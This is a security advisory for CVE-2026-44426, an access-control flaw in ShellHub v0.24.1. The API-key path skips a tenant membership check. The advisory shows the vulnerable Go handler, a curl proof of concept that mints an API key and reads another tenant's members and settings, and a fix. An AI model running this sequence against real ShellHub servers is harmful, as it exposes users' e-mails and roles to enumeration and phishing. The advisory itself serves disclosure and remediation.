PT-2026-38405 · Go · Github.Com/Shellhub-Io/Shellhub
Published
2026-05-07
·
Updated
2026-05-07
·
CVE-2026-44426
CVSS v3.1
6.5
Medium
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |
Summary
GET /api/namespaces/:tenant returns the full namespace object — including the members list (user IDs, e-mails, roles), settings, and device counts — to any caller authenticated by an API Key, for any tenant, regardless of the API Key's own tenant scope.The handler conditionally skips the membership check when the user ID (
X-ID) is absent, which is exactly the case for API Key authentication.Affected versions
ShellHub Community v0.24.1 (validated).
Root cause
api/routes/nsadm.go:75-102 — membership check is skipped when c.ID() is nil:var uid string
if c.ID() != nil {
uid = c.ID().ID
}
ns, err := h.service.GetNamespace(c.Ctx(), req.Tenant)
if err != nil || ns == nil {
return c.NoContent(http.StatusNotFound)
}
if uid != "" { // ⚠️ skipped when API Key is used
if , ok := ns.FindMember(uid); !ok {
return c.NoContent(http.StatusForbidden)
}
}
return c.JSON(http.StatusOK, ns)AuthRequest (api/routes/auth.go:53-64) sets only X-Tenant-ID, X-Role,
and X-API-KEY for API Key authentication — never X-ID. So
c.Request().Header.Get("X-ID") returns "", c.ID() returns nil, and
the membership check is bypassed.Proof of concept (validated live against v0.24.1)
# Attacker authenticates in their own namespace and mints an API Key
ATTACKER TOKEN=$(curl -s -X POST http://target/api/login
-H 'Content-Type: application/json'
-d '{"username":"attacker","password":"..."}' | jq -r .token)
ATTACKER KEY=$(curl -s -X POST http://target/api/namespaces/api-key
-H "Authorization: Bearer $ATTACKER TOKEN"
-H 'Content-Type: application/json'
-d '{"name":"poc","expires at":30}' | jq -r .id)
# Baseline: same request with JWT is correctly blocked
curl -i http://target/api/namespaces/<victim-tenant-uuid>
-H "Authorization: Bearer $ATTACKER TOKEN"
# Observed: HTTP 403 (correct)
# Exploit: same request with API Key returns full namespace
curl -i http://target/api/namespaces/<victim-tenant-uuid>
-H "X-API-Key: $ATTACKER KEY"
# Observed: HTTP 200 + {name, owner, tenant id, members:[{id,email,role,added at},...],
# settings, max devices, devices accepted count, type, created at}Impact
- Enumeration of any ShellHub namespace by tenant UUID.
- Disclosure of member e-mails, user IDs, and roles → user enumeration and targeted phishing against the victim organization.
- Disclosure of namespace settings (session recording on/off, announcement text), device counts, namespace type, owner identity.
Suggested fix
Two layers:
- Primary — enforce caller-tenant match before returning the namespace, covering both JWT and API Key callers:
// nsadm.go GetNamespace
if c.Tenant() != nil && c.Tenant().ID != req.Tenant {
return c.NoContent(http.StatusForbidden)
}Fix
IDOR
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Github.Com/Shellhub-Io/Shellhub